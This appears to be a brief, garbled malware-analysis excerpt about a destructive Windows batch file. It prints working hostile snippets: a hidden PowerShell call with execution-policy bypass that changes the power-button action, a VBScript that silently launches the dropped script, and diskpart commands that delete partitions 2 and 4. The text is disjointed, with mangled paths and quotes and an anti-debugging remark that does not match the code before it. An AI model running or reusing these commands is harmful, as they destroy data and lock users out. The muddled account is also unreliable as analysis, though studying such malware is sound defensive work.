A Simple Batch File That Blocks Computer usage

The function BlockInput expects one parameter: TRUE or FALSE. When TRUE is passed, it blocks keyboard and mouse input events from reaching applications. From the user’s point of view, it means that no interaction is possible with the computer until the API is called a second time with “FALSE”. This API is provided by Microsoft to prevent the user to perform actions when the computer executes sensitive operations. The next one-liner used reconfigures the way the power button works: powershell -exec bypass -w h -c “powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0” powercfg.exe is a standard tool provided by Microsoft[2] that allows interaction with power schemes. Then, the script drops two scripts on the target: set WshShell = wscript.createobject(“WScript.shell”) WshShell.run “””C:WindowsTempx.bat”” “, 0, true The file x.bat is a long script that destroys the victim’s computer. Here are some pieces of code: :: deleting some Windows partitions echo Select Disk 0 >> y.txt echo Select Partition 2 >> y.txt echo Delete Partition Override >> y.txt echo Select Partition 4 >> y.txt echo Delete Partition Override >> y.txt diskpart /s y.txt >nul Also possible: :: creating a message box echo msgbox”stupid b*tch”,0 , “get rekt, ur PC has been f*cked” >> y.vbs This is a common anti-debugging technique implemented by malware to prevent the Analyst to interact with the debugger.